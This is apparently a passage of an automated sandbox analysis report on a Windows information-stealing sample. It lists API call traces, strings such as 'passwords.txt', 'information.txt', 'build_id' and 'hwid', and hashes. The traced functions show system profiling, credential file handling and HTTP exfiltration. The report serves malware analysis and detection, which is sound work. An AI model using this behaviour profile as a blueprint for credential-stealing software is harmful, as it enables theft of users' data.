Part of subcall function 0040EB34: HeapAlloc.KERNEL32(00000000,?,?,?,00413901,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004244D8,00000000,?), ref: 0040EB4F
Part of subcall function 0040EB34: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413901,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040EB6D
Part of subcall function 0040EB34: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413901,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040EB89

Part of subcall function 0040EBD0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040EC23
Part of subcall function 0040EBD0: wsprintfA.USER32 ref: 0040EC69

Part of subcall function 0040EB9D: GetSystemInfo.KERNEL32(00000000), ref: 0040EBAA
Part of subcall function 0040EB9D: wsprintfA.USER32 ref: 0040EBBF

Part of subcall function 0040EC9D: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,00424428,00000000,?,Work Dir: In memory,00000000,?,00424410), ref: 0040ECAB
Part of subcall function 0040EC9D: HeapAlloc.KERNEL32(00000000), ref: 0040ECB2
Part of subcall function 0040EC9D: GlobalMemoryStatusEx.KERNEL32 ref: 0040ECD2
Part of subcall function 0040EC9D: wsprintfA.USER32 ref: 0040ECF8

Part of subcall function 0040ED06: _EH_prolog.MSVCRT ref: 0040ED0B
Part of subcall function 0040ED06: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040EDC7

Part of subcall function 0040F039: _EH_prolog.MSVCRT ref: 0040F03E
Part of subcall function 0040F039: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F079
Part of subcall function 0040F039: Process32First.KERNEL32(00000000,00000128), ref: 0040F08A
Part of subcall function 0040F039: Process32Next.KERNEL32(?,00000128), ref: 0040F0F2
Part of subcall function 0040F039: CloseHandle.KERNEL32(?,?,00000000), ref: 0040F0FF

Part of subcall function 0040EDE7: _EH_prolog.MSVCRT ref: 0040EDEC
Part of subcall function 0040EDE7: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004240DF,00000000,00000000), ref: 0040EE34

Part of subcall function 0040EDE7: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040EE7E
Part of subcall function 0040EDE7: wsprintfA.USER32 ref: 0040EEA8
Part of subcall function 0040EDE7: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040EEC5
Part of subcall function 0040EDE7: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040EEEF
Part of subcall function 0040EDE7: lstrlen.KERNEL32(?), ref: 0040EF04
Part of subcall function 0040EDE7: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00424110), ref: 0040EF84

lstrlen.KERNEL32(00000000,00000000,?,00424550,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00424540), ref: 00413D7B

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Local Time: , xrefs: 00413786
GUID: , xrefs: 00413195
MachineID: , xrefs: 00413116
AV: , xrefs: 004134C0
Threads: , xrefs: 004139E2
HWID: , xrefs: 00413229
[Processes], xrefs: 00413BC8
Version: , xrefs: 00412FD5
Cores: , xrefs: 0041395D
Work Dir: In memory, xrefs: 00413359
Windows: , xrefs: 004133AD
Processor: , xrefs: 004138CC
Path: , xrefs: 004132BD
V, xrefs: 00413DAF
Computer Name: , xrefs: 00413554
[Hardware], xrefs: 0041389C
RAM: , xrefs: 00413A67
Display Resolution: , xrefs: 00413652
TimeZone: , xrefs: 0041380B
information.txt, xrefs: 00413D96
User Name: , xrefs: 004135D3
Install Date: , xrefs: 0041342C
Date: , xrefs: 00413097
Keyboard Languages: , xrefs: 004136E6
VideoCard: , xrefs: 00413AEC
[Software], xrefs: 00413C74

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $V$Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 722754166-310184570
Opcode ID: e619fa44320a456808720408a63f18d1fa94b1fd3ed85c31a78d74f58beb0d0d
Instruction ID: 09a2893ea3b480e0fad63dd247d4e0b70015776e8a4f6143213ff95badc623b7
Opcode Fuzzy Hash: e619fa44320a456808720408a63f18d1fa94b1fd3ed85c31a78d74f58beb0d0d
Instruction Fuzzy Hash: 1EA24575804289E9CB06E7E2D956BDEBB785F24308F5008AEE101731C2EF791B58DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCF1 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 264
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040BCF6

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040F870: _EH_prolog.MSVCRT ref: 0040F875
Part of subcall function 0040F870: GetSystemTime.KERNEL32(?,004242A8,00000001,00000000,00000000), ref: 0040F8B5

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423A8B,00000000), ref: 0040BD99
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040BDF6
RtlAllocateHeap.NTDLL(00000000), ref: 0040BDFD
lstrlen.KERNEL32(00000000,00000000), ref: 0040BE8E
lstrcat.KERNEL32(?), ref: 0040BEA6
lstrcat.KERNEL32(?,00000000), ref: 0040BEB8
lstrcat.KERNEL32(?,00423A90), ref: 0040BEC6
lstrcat.KERNEL32(?,00000000), ref: 0040BED8
lstrcat.KERNEL32(?,00423A94), ref: 0040BEE6
lstrcat.KERNEL32(?), ref: 0040BEF5
lstrcat.KERNEL32(?,00000000), ref: 0040BF07
lstrcat.KERNEL32(?,00423A98), ref: 0040BF15
lstrcat.KERNEL32(?), ref: 0040BF24
lstrcat.KERNEL32(?,00000000), ref: 0040BF36
lstrcat.KERNEL32(?,00423A9C), ref: 0040BF44
lstrcat.KERNEL32(?), ref: 0040BF53
lstrcat.KERNEL32(?,00000000), ref: 0040BF65
lstrlen.KERNEL32(?), ref: 0040BFB5

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

memset.MSVCRT ref: 0040C005
DeleteFileA.KERNEL32(00000000), ref: 0040C032

Strings

passwords.txt, xrefs: 0040BFC7

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
String ID: passwords.txt
API String ID: 3555799664-347816968
Opcode ID: ff40ac5e01da61b1d3151469d53a137badb0ff10457c6d1fc7eb53b10f8e7736
Instruction ID: b68b46f1e150df340f1af1b69219f443d2a10d161bc8a1e64da312ee0a074794
Opcode Fuzzy Hash: ff40ac5e01da61b1d3151469d53a137badb0ff10457c6d1fc7eb53b10f8e7736
Instruction Fuzzy Hash: 1EB15F31800109EFDB05EBE5EC4AAEDBB75FF14309F10482AF411721E1EB795A25DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004121E7 Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 899
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004121EC

Part of subcall function 00411F80: _EH_prolog.MSVCRT ref: 00411F85

Part of subcall function 0040E5F4: lstrlen.KERNEL32(?,00000000,?,00414F6E,004243BA,004243B7,00000000,00000000,?,00415729), ref: 0040E5FD
Part of subcall function 0040E5F4: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E631

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004123CA
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412460

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00411A1D: _EH_prolog.MSVCRT ref: 00411A22
Part of subcall function 00411A1D: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411A7D

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041259E
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412634
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412772

Part of subcall function 00411B01: _EH_prolog.MSVCRT ref: 00411B06
Part of subcall function 00411B01: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411B85
Part of subcall function 00411B01: lstrlen.KERNEL32(00000000), ref: 00411B9C
Part of subcall function 00411B01: StrStrA.SHLWAPI(00000000,00000000), ref: 00411BC3
Part of subcall function 00411B01: lstrlen.KERNEL32(00000000), ref: 00411BD8
Part of subcall function 00411B01: lstrlen.KERNEL32(00000000), ref: 00411BF0

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412808
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412946
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004129DC
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412B1A
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00412BAA
Sleep.KERNEL32(0000EA60), ref: 00412BB9

Strings

", xrefs: 00412D57
ERROR, xrefs: 00412B0C
ERROR, xrefs: 004129CE
ERROR, xrefs: 00412764
ERROR, xrefs: 004123BC
ERROR, xrefs: 004127FA
ERROR, xrefs: 00412452
ERROR, xrefs: 00412590
ERROR, xrefs: 00412626
ERROR, xrefs: 00412938
ERROR, xrefs: 00412B9C

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpylstrlen$Sleep
String ID: "$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 1345713276-2213018930
Opcode ID: d4adb2a7c4583196739f4b40a740c0838ff1fe0ca3556a86eed2419b0475d62b
Instruction ID: 8238cbe3c64d60888d805ec546ad7bb145aaa3945331af815ae1bf23aefcd795
Opcode Fuzzy Hash: d4adb2a7c4583196739f4b40a740c0838ff1fe0ca3556a86eed2419b0475d62b
Instruction Fuzzy Hash: 15724270D00248EADB05EBFAC946BDDBBB8AF15308F5045AEF445B32C1EB7857488766

Uniqueness

Uniqueness Score: -1.00%

Function 00403F1B Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00403F20

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 00403E7A: _EH_prolog.MSVCRT ref: 00403E7F
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EB1
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EBA
Part of subcall function 00403E7A: ??_U@YAPAXI@Z.MSVCRT ref: 00403EC3
Part of subcall function 00403E7A: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403EDD
Part of subcall function 00403E7A: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403EED

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403FCB
StrCmpCA.SHLWAPI(?), ref: 00403FE2

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040416A
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004041A4
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004041C8

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

lstrlen.KERNEL32(00000000,00000000,?,?,?,?,004238C5,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 004044A4
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004044BD
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004044CE
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404522
InternetCloseHandle.WININET(00000000), ref: 0040452D
InternetCloseHandle.WININET(?), ref: 00404542
InternetCloseHandle.WININET(?), ref: 0040454B

Strings

", xrefs: 004043EF
build_id, xrefs: 004043C5
------, xrefs: 00404064
", xrefs: 004042A0
hwid, xrefs: 00404276
------, xrefs: 0040431D
------, xrefs: 004041CE
!, xrefs: 0040450C

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1139859944-3346224549
Opcode ID: b87dcb68e345e1dde03e0e9f8d1bc76079e9865f436446654b34a5420bd0ccee
Instruction ID: bb3908393a8d38a25c470b69f44bd94c55f9748966edcb27c6465708ea3b7168
Opcode Fuzzy Hash: b87dcb68e345e1dde03e0e9f8d1bc76079e9865f436446654b34a5420bd0ccee
Instruction Fuzzy Hash: B522A571800148EADB05EBE6D952AEEBBB8AF24308F50486EF501731C2DF791B19DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00406A64 Relevance: 33.5, APIs: 22, Instructions: 492
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00406A69

Part of subcall function 0040E792: StrCmpCA.SHLWAPI(?,00406A8A,?,00406A8A,00000000), ref: 0040E79B

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423A97,00000000), ref: 00406B9D

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 0040FD6A: _EH_prolog.MSVCRT ref: 0040FD6F
Part of subcall function 0040FD6A: memset.MSVCRT ref: 0040FD91
Part of subcall function 0040FD6A: OpenProcess.KERNEL32(00001001,00000000,?,?,00000000), ref: 0040FE18
Part of subcall function 0040FD6A: TerminateProcess.KERNEL32(00000000,00000000), ref: 0040FE26
Part of subcall function 0040FD6A: CloseHandle.KERNEL32(00000000), ref: 0040FE2D

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406D8F
RtlAllocateHeap.NTDLL(00000000), ref: 00406D96
lstrcat.KERNEL32(?,00000000), ref: 00406EB4
lstrcat.KERNEL32(?,00423AD0), ref: 00406EC2
lstrcat.KERNEL32(?,00000000), ref: 00406ED4
lstrcat.KERNEL32(?,00423AD4), ref: 00406EE2
lstrlen.KERNEL32(?), ref: 00407029
lstrlen.KERNEL32(?), ref: 00407037

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

memset.MSVCRT ref: 0040708C
DeleteFileA.KERNEL32(00000000), ref: 004070B1

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$Processlstrcpylstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
String ID:
API String ID: 36237839-0
Opcode ID: f46b7f6dcf013fd70476b3e03b5da1cda96f856d97b4c99cc6374ea3bd78b17d
Instruction ID: a07319064bb3ccddf9a0efa96e0f253e2b573725a1a3df2111187ec99c7616ac
Opcode Fuzzy Hash: f46b7f6dcf013fd70476b3e03b5da1cda96f856d97b4c99cc6374ea3bd78b17d
Instruction Fuzzy Hash: 4C126D31800148EEDF05EBE6DC46AEDBB74AF24308F50486EF442721D2EF791A19DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00408A2F Relevance: 33.4, APIs: 22, Instructions: 387stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00408A34

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

Part of subcall function 0040F870: _EH_prolog.MSVCRT ref: 0040F875
Part of subcall function 0040F870: GetSystemTime.KERNEL32(?,004242A8,00000001,00000000,00000000), ref: 0040F8B5

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?,00423AD7), ref: 00408AE5
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408C50
RtlAllocateHeap.NTDLL(00000000), ref: 00408C57
lstrcat.KERNEL32(?,00000000), ref: 00408D7B
lstrcat.KERNEL32(?,00423CB0), ref: 00408D89
lstrcat.KERNEL32(?,00000000), ref: 00408D9B
lstrcat.KERNEL32(?,00423CB4), ref: 00408DA9
lstrlen.KERNEL32(?), ref: 00408EBC
lstrlen.KERNEL32(?), ref: 00408ECA

Part of subcall function 0040E5B7: lstrcpy.KERNEL32(00000000,GPA), ref: 0040E5DD

Part of subcall function 004010A5: _EH_prolog.MSVCRT ref: 004010AA

Part of subcall function 00412DF0: _EH_prolog.MSVCRT ref: 00412DF5
Part of subcall function 00412DF0: CreateThread.KERNEL32(00000000,00000000,00411D06,?,00000000,00000000), ref: 00412E95
Part of subcall function 00412DF0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00412E9D

memset.MSVCRT ref: 00408F20
DeleteFileA.KERNEL32(00000000), ref: 00408F45

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
String ID:
API String ID: 156379684-0
Opcode ID: 214927e2a1d520b79821a5260d73ccb5bdc00e49c5e103405044268a1e052877
Instruction ID: 59b21dadaf2c4c7a6111e4b0da580445d34c8f80196bf31f833ad6a6be4d0115
Opcode Fuzzy Hash: 214927e2a1d520b79821a5260d73ccb5bdc00e49c5e103405044268a1e052877
Instruction Fuzzy Hash: 1CF16A31800148EEDB05EBE6DD46BEDBB75AF24308F10886AF442721D2EF781A19DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4D4 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 146memorycomtimeCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F4D9
CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,00424428,00000000,?,Work Dir: In memory,00000000,?,00424410,00000000), ref: 0040F4E9
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,00424428), ref: 0040F4FA
CoCreateInstance.OLE32(00424CC8,00000000,00000001,00424BF8,?,?,?,?,?,?,?,00424428,00000000,?,Work Dir: In memory,00000000), ref: 0040F514
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,00424428,00000000), ref: 0040F54A
VariantInit.OLEAUT32(?), ref: 0040F5A5

Part of subcall function 0040F43A: CoCreateInstance.OLE32(00424A78,00000000,00000001,00424298,00000000,?), ref: 0040F45A
Part of subcall function 0040F43A: SysAllocString.OLEAUT32(00000000), ref: 0040F468
Part of subcall function 0040F43A: _wtoi64.MSVCRT ref: 0040F4AA
Part of subcall function 0040F43A: SysFreeString.OLEAUT32(?), ref: 0040F4BF
Part of subcall function 0040F43A: SysFreeString.OLEAUT32(00000000), ref: 0040F4C2

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00424428,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F5DC
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,?,00424428,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F5E8
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00424428,00000000,?,Work Dir: In memory,00000000,?,00424410), ref: 0040F5EF
VariantClear.OLEAUT32(?), ref: 0040F631
wsprintfA.USER32 ref: 0040F61B

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Strings

InstallDate, xrefs: 0040F5B7
%d/%d/%d %d:%d:%d, xrefs: 0040F615
Select * From Win32_OperatingSystem, xrefs: 0040F55A
